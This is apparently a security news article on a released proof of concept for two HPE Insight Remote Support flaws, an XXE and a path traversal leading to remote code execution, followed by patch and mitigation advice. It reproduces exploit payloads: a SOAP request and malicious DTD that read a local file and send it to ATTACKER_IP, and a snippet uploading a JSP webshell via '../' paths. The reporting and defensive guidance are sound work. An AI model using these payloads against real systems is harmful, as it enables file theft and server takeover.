PoC Released for HPE Remote Support Tool Vulnerability Allowing Remote Code Execution

Security researchers have released proof-of-concept (PoC) exploit code for critical vulnerabilities in Hewlett Packard Enterprise’s (HPE) Insight Remote Support (IRS) tool, including an unauthenticated XML External Entity (XXE) injection flaw (CVE-2024-53675) and a path traversal-based remote code execution (RCE) vulnerability (CVE-2024-53676). 

These flaws affect IRS versions prior to v7.14.0.629 and expose systems to arbitrary file disclosure and full SYSTEM-level command execution.

Technical Breakdown of Exploitation Chain

XXE Vulnerability in Device Registration Workflow (CVE-2024-53675)

The XXE vulnerability originates in the validateAgainstXSD method of HPE’s ucacore library, which processes XML input during device registration without proper Document Type Definition (DTD) restrictions, as per a report by Github. 

Attackers can exploit this by injecting malicious XML entities into the <tns:identifiers> parameter of SOAP requests to the /DeviceRegistration/DeviceRegistration.svc endpoint.

Below is an abridged PoC exploiting the XXE to exfiltrate the first line of C:\users\Administrator\Desktop\hello.txt:

<soap12:Envelope xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> 

    <soap12:Header> 

        <wsa:Action>http://www.hp.com/it/sa/reg/Registration/RegisterDevice</wsa:Action> 

    </soap12:Header> 

    <soap12:Body> 

        <tns:RegisterDevice> 

            <tns:identifiers> 

                <![CDATA[<!DOCTYPE a SYSTEM "http://ATTACKER_IP/malicious.dtd"> 

                <a>&callhome;</a>]]> 

            </tns:identifiers> 

        </tns:RegisterDevice> 

    </soap12:Body> 

</soap12:Envelope>

The attacker-hosted malicious.dtd forces the XML parser to leak file contents through an HTTP request:

<!ENTITY % file SYSTEM "file:///C:\users\Administrator\Desktop\hello.txt"> 

<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://ATTACKER_IP/?content=%file;'>"> 

%eval; 

%exfiltrate;

Path Traversal to RCE (CVE-2024-53676)

The RCE vulnerability resides in the processAtatchmentDataStream method of the DataPackageReceiverWebSvcHelper class.

This function improperly validates the attachmentName parameter during file uploads to the /DataPackageReceiver/DataPackageReceiverService.svc endpoint, enabling directory traversal. 

Attackers can upload malicious JSP files to arbitrary directories (e.g., Tomcat web roots) by crafting SOAP requests with ../ sequences:

xml_body = f""" 

<web:DataPackageSubmissionRequest> 

    <web:attachments> 

        <web:ArrayOfAttachment> 

            <web:Attachment> 

                <web:FileName>../../webapps/ROOT/shell.jsp</web:FileName> 

                <web:FileContent>{base64.b64encode(malicious_jsp).decode()}</web:FileContent> 

            </web:Attachment> 

        </web:ArrayOfAttachment> 

    </web:attachments> 

</web:DataPackageSubmissionRequest> 

"""

The vulnerability stems from unvalidated concatenation of attachmentFileLocation, allowing attackers to override critical system files:

String attachmentFileLocation = attachmentFileDirectory + File.separatorChar + attachmentName; 

File file = new File(attachmentFileLocation); 

file.createNewFile(); // Writes attacker-controlled content to arbitrary paths

While the XXE exploit reliably leaks first-line file contents, researchers noted limitations in retrieving multi-line files due to parser constraints. 

The RCE exploit, however, faces a critical dependency: successful exploitation requires a valid oosId (device registration token) and registrationToken, which attackers must obtain via other means (e.g., brute-forcing or leveraging the XXE to steal tokens).

In lab environments, unregistered devices triggered errors that halted attachment processing:

[ERROR] DataPackageReceiverWebSvcHelper: This device (oosId: 93f6…e39) is not found…aborted processing. 

Despite this, attackers with valid credentials (e.g., compromised partner accounts) could chain both vulnerabilities to:

1. Steal oosId/registrationToken via XXE
2. Upload JSP webshells via RCE

Mitigation and Patch Status

HPE addressed both issues in IRS v7.14.0.629 through:

1. Disabling DTD processing in XML validators
2. Implementing input sanitization for attachmentName parameters
3. Adding authentication checks for device registration workflows

Organizations using IRS should immediately upgrade to the patched version and audit logs for suspicious SOAP requests to /DeviceRegistration or /DataPackageReceiver endpoints.

Network defenders can also block external access to these paths if HPE IRS operates in an internal-only capacity.

Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free